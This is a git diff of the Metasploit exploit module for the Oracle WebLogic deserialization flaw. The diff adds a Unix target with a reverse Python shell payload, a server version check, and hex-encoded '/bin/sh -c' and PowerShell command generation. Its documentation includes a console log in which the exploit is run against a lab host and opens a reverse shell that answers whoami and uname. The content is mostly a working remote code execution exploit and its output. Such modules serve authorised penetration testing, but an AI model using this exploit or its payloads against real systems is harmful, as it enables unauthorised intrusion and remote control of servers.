diff --git a/documentation/modules/exploit/windows/misc/weblogic_deserialize.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md similarity index 52% rename from documentation/modules/exploit/windows/misc/weblogic_deserialize.md rename to documentation/modules/exploit/multi/misc/weblogic_deserialize.md index ce303d7498..59a1ec2406 100644 --- a/documentation/modules/exploit/windows/misc/weblogic_deserialize.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md @@ -45,3 +45,39 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > ``` + +### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29 +``` +msf5 > use exploit/windows/misc/weblogic_deserialize +msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205 +rhosts => 172.22.222.205 +msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197 +lhost => 172.22.222.197 +msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197 +srvhost => 172.22.222.197 +msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true +verbose => true +msf5 exploit(windows/misc/weblogic_deserialize) > check + +[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0 +[*] 172.22.222.205:7001 The target appears to be vulnerable. +msf5 exploit(windows/misc/weblogic_deserialize) > run +[*] Exploit running as background job 2. +msf5 exploit(windows/misc/weblogic_deserialize) > +[*] Started reverse TCP handler on 172.22.222.197:4444 +[*] 172.22.222.205:7001 - Sending handshake... +[*] 172.22.222.205:7001 - Sending client object payload... +[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205 +[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205 +[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205 +[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500 +[*] 172.22.222.205:7001 - Server stopped. +msf5 exploit(windows/misc/weblogic_deserialize) > +sessions -i 1 +[*] Starting interaction with 1... + +whoami +msfdev +uname -a +Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +``` diff --git a/modules/exploits/windows/misc/weblogic_deserialize.rb b/modules/exploits/multi/misc/weblogic_deserialize.rb similarity index 89% rename from modules/exploits/windows/misc/weblogic_deserialize.rb rename to modules/exploits/multi/misc/weblogic_deserialize.rb index 7d22d3e7b8..9209a780cb 100644 --- a/modules/exploits/windows/misc/weblogic_deserialize.rb +++ b/modules/exploits/multi/misc/weblogic_deserialize.rb @@ -34,10 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => false, 'Targets' => [ - [ 'Windows', - { - 'Platform' => ['win'] + [ 'Unix', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, + 'Payload' => { + 'Encoder' => 'cmd/ifs', + 'BadChars' => ' ', + 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} } + ], + [ 'Windows', + 'Platform' => 'win', + 'Payload' => {}, + 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} ] ], 'DefaultTarget' => 0, @@ -48,10 +58,47 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Apr 17 2018')) end + def check + connect + req = "GET /console/login/LoginForm.jsp HTTP/1.1\n" + req << "Host: #{peer}\n\n" + sock.put(req) + + res = sock.get_once + disconnect + return CheckCode::Unknown unless res + + /WebLogic Server Version: (?\d+\.\d+\.\d+\.*\d*)/ =~ res + if version + version = Gem::Version.new(version) + vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}") + + case + when version.to_s.start_with?('10.3') + return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') + when version.to_s.start_with?('12.1') + return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') + when version.to_s.start_with?('12.2') + return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3') + end + end + + if res.include?('Oracle WebLogic Server Administration Console') + return CheckCode::Detected + end + + CheckCode::Unknown + end + def gen_resp - pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first) - pwrshl.gsub!("%COMSPEC%", "cmd.exe") - tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join + if target.name == 'Windows' + pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) + tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join + else + nix_cmd = payload.encoded + nix_cmd.prepend('/bin/sh -c ') + tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join + end mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0') mycmd << tmp_dat @@ -140,7 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote @resp << '7e005a' end - def on_client_connect(client) # Make sure to only sent one meterpreter payload to a host. # During testing the remote host called back up to 11 times @@ -149,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote if @met_sent.include?(client.peerhost) then return end @met_sent << client.peerhost - vprint_status("met_sent: #{@met_sent}") + vprint_status("Sending payload to client: #{client.peerhost}") # Response format determined by watching network traffic # generated by EDB PoC @@ -304,7 +350,7 @@ class MetasploitModule < Msf::Exploit::Remote start_service - vprint_status('Sending payload...') + print_status('Sending client object payload...') send_payload_objdata # Need to wait this long to make sure we get a shell back